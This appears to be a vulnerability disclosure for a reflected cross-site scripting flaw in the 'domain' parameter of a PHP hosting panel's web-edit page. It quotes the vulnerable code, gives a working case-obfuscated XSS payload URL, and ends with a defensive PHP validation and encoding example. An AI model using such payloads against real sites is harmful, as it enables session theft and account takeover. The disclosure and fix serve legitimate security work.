The user-controlled GET parameter domain in index.php is not sanitized, resulting in Reflected Cross-Site Scripting.
GET https://{HOST}/edit/web/
// File: /web/edit/web/index.php#L28
// List domain
$v_domain = $_GET['domain']; // User controllable parameter
// The ownership check below runs only for non-admin sessions;
// for an admin session the value is accepted as-is.
if ($_SESSION['userContext'] !== 'admin') {
    if (!in_array($v_domain, $user_domains)) {
        header("Location: /list/mail/");
        exit;
    }
}
GET https://{HOST}/edit/web/?domain=<htmL/+/OnpOintEReNTEr%0d=%0d["XSS-HERE"].find(confirm)//
&token=01de3634f2469d87dab9b338eaff4863
This vulnerability allows an attacker to run malicious JavaScript in the context of the affected web pages, steal a user's cookie, and gain unauthorized access to that user's account through the stolen cookie.
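One way to close this class of bug, shown as an added example rather than the project's own code or its actual fix: validate the domain parameter for every session (including admin, which the check above skips) and HTML-encode it wherever it is written into a page. The helper names validate_domain_param() and h() are hypothetical, the sample inputs are constructed, and the pattern assumes domains arrive in ASCII (punycode) form.

```php
<?php
// Added example: hypothetical helpers, not taken from the project.

// Return the lower-cased domain if it is a syntactically valid hostname, else null.
function validate_domain_param($raw): ?string
{
    // Rejects missing values, arrays (?domain[]=x), empty and oversized input.
    if (!is_string($raw) || $raw === '' || strlen($raw) > 253) {
        return null;
    }
    // Dot-separated labels of letters, digits and inner hyphens only,
    // so characters such as < > " ' / = and whitespace can never pass.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $raw) !== 1) {
        return null;
    }
    return strtolower($raw);
}

// Encode a value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs, standing in for $_GET['domain'].
$samples = [
    'example.com',
    'Sub.Example.COM',
    '<i>not-a-domain</i>',
    "example.com\r\n",
    ['array', 'input'],
];

foreach ($samples as $raw) {
    $domain = validate_domain_param($raw);
    $shown  = is_string($raw) ? $raw : json_encode($raw);
    if ($domain === null) {
        // Real handler: stop here (redirect or 400) before any ownership check or output.
        printf("rejected: %s\n", h($shown));
    } else {
        // Validation is the gate; encoding at output is still applied as defence in depth.
        printf("accepted: %s\n", h($domain));
    }
}
```

In the handler, the validation call belongs directly after the parameter is read and before the userContext branch, so an admin session gets the same treatment as any other.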